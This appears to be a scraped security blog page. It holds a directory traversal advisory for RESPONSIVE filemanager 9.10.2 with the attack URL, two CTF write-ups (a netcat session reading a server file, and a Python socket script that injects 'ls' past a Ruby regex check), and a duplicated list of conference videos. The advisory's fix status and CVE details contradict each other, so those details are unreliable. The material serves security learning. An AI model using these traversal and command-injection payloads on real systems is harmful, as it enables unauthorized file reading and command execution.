RESPONSIVE filemanager <= 9.10.2 - Directory Traversal
Advisory: Directory Traversal in RESPONSIVE filemanager on Window Server
During a penetration test discovered a directory traversal vulnerability
in RESPONSIVE filemanager. Attackers are able to read arbitrary directory by specifying a
relative path.
Details
=======
Product: DRESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL:
http://www.responsivefilemanager.com/
Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: WINDOW SERVER
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575
Attack Detail
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
fldr=..\..\..\
Thursday, 9 June 2016
Monday, 14 March 2016
CODEGATE 2016: JS_is_not_a_jail
JS_is_not_a_jail
nc 175.119.158.131 1129
nc 175.119.158.131 1129
After connect the server, I try to "quit()" command.
It was occurred a error with the file path "/home/codegate/cg.js"
I can use a read() feature to read the code.
read('/home/codegate/cg.js')
FLAG:
easy xD, get a more hardest challenge!
Monday, 22 February 2016
Internetwache 2016 EXP50 Writeup
When I access the server ;188.166.133.53:12037.
It shows "Let me count the ascii values of 10 characters:".
I just input some text such as "test", Then it shows an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"
The Ruby has a vulnerability of regex. I code to get a Flag.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))
print s.recv(1024)
print s.recv(1024)
s.send('ls\naaaaaaaaaa')
print s.recv(1024)
s.close()
Then, the server returns as below:
$ python test.py
Let me count the ascii values of 10 characters:
Sum is: 1203
IW{RUBY_R3G3X_F41L}
FLAG:
IW{RUBY_R3G3X_F41L}
Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
Wednesday, 13 January 2016
List of all the security conference in 2015 (or older)
Reference: https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/
1. Security Conferences from 2015
https://www.tunnelsup.com/online-security-conferences/
2. NorthSec, Montreal, Canada
https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh
3. 32C3
https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW
4. PS4 Booting and running Linux
https://www.youtube.com/watch?v=PQFNnr6Ly9M
5. Metcalf - Modern Active Directory Attacks (Blackhat usa 2015)
https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42
6. Rob Fuller - Basic Security
ttps://www.youtube.com/watch?v=TqbGNFfl1d8
7. SteelCon (Sheffield, UK, July 3-5 2015)
https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j
8. ekoparty 2015
ttps://vimeo.com/album/3682874
9. OWASP AppSec EU and CA
https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU
10. Crypto 2015
https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H
http://www.iacr.org/conferences/crypto2015/
11. BSides Orlando (- April 11 – 12, 2015 -)
https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6
12. BruCON as well (26-27 October)
https://www.youtube.com/user/brucontalks
13. USENIX Security '15
https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3
14. Brucon (Belgium)
https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB
15. CERT.pl's Secure 2015
https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB
16. CornCon
https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0
17. BSides Charleston
https://www.youtube.com/user/bsideschs/videos
18. SaintCON 2015 at Weber State University in Ogden UT
https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ
19. BSidesSLC that will be in Salt Lake City 2016
https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A
20. syscan
https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ
21. Brocon 2015
https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo
22. CarolinaCon
https://www.youtube.com/user/CarolinaConVideos/videos
23. Bsides Lisbon 2015
https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q
1. Security Conferences from 2015
https://www.tunnelsup.com/online-security-conferences/
2. NorthSec, Montreal, Canada
https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh
3. 32C3
https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW
4. PS4 Booting and running Linux
https://www.youtube.com/watch?v=PQFNnr6Ly9M
5. Metcalf - Modern Active Directory Attacks (Blackhat usa 2015)
https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42
6. Rob Fuller - Basic Security
ttps://www.youtube.com/watch?v=TqbGNFfl1d8
7. SteelCon (Sheffield, UK, July 3-5 2015)
https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j
8. ekoparty 2015
ttps://vimeo.com/album/3682874
9. OWASP AppSec EU and CA
https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU
10. Crypto 2015
https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H
http://www.iacr.org/conferences/crypto2015/
11. BSides Orlando (- April 11 – 12, 2015 -)
https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6
12. BruCON as well (26-27 October)
https://www.youtube.com/user/brucontalks
13. USENIX Security '15
https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3
14. Brucon (Belgium)
https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB
15. CERT.pl's Secure 2015
https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB
16. CornCon
https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0
17. BSides Charleston
https://www.youtube.com/user/bsideschs/videos
18. SaintCON 2015 at Weber State University in Ogden UT
https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ
19. BSidesSLC that will be in Salt Lake City 2016
https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A
20. syscan
https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ
21. Brocon 2015
https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo
22. CarolinaCon
https://www.youtube.com/user/CarolinaConVideos/videos
23. Bsides Lisbon 2015
https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q
Subscribe to:
Posts (Atom)